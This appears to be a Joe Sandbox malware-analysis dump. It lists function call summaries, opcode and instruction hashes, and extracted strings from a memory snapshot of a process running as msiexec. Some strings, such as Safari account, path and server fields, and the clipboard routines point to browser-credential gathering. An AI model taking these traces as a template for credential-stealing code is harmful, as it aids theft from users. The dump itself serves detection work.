                                                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                              APIs
                                                                                              • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnumNamesResource
                                                                                              • String ID:
                                                                                              • API String ID: 3334572018-0
                                                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                              APIs
                                                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                              • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004095FC
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 3655998216-0
                                                                                              • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                              • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00445426
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1828521557-0
                                                                                              • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                              • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp
                                                                                              • String ID:
                                                                                              • API String ID: 2081463915-0
                                                                                              • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                              • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                              APIs
                                                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                                              • String ID:
                                                                                              • API String ID: 2136311172-0
                                                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                              APIs
                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@
                                                                                              • String ID:
                                                                                              • API String ID: 1936579350-0
                                                                                              • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                              • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free
                                                                                              • String ID:
                                                                                              • API String ID: 1294909896-0
                                                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free
                                                                                              • String ID:
                                                                                              • API String ID: 1294909896-0
                                                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free
                                                                                              • String ID:
                                                                                              • API String ID: 1294909896-0
                                                                                              • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                              • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                              • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                              • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                              APIs
                                                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                              • GetLastError.KERNEL32 ref: 00409974
                                                                                              • CloseClipboard.USER32 ref: 0040997D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3604893535-0
                                                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                              • API String ID: 2780580303-317687271
                                                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                              APIs
                                                                                              • EmptyClipboard.USER32 ref: 00409882
                                                                                              • wcslen.MSVCRT ref: 0040988F
                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                              • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                              • CloseClipboard.USER32 ref: 004098D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                              • String ID:
                                                                                              • API String ID: 1213725291-0
                                                                                              • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                              • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                                                              • free.MSVCRT ref: 00418370
                                                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                              • String ID: OsError 0x%x (%u)
                                                                                              • API String ID: 2360000266-2664311388
                                                                                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                              • String ID:
                                                                                              • API String ID: 1865533344-0
                                                                                              • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                              • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                              • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                              • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                              APIs
                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: NtdllProc_Window
                                                                                              • String ID:
                                                                                              • API String ID: 4255912815-0
                                                                                              • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                              • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                              • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                              • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                              APIs
                                                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                              • memset.MSVCRT ref: 0040265F
                                                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                              • API String ID: 577499730-1134094380
                                                                                              • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                              • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                              • String ID: :stringdata$ftp://$http://$https://
                                                                                              • API String ID: 2787044678-1921111777
                                                                                              • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                              • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                              • GetDC.USER32 ref: 004140E3
                                                                                              • wcslen.MSVCRT ref: 00414123
                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                              • _snwprintf.MSVCRT ref: 00414244
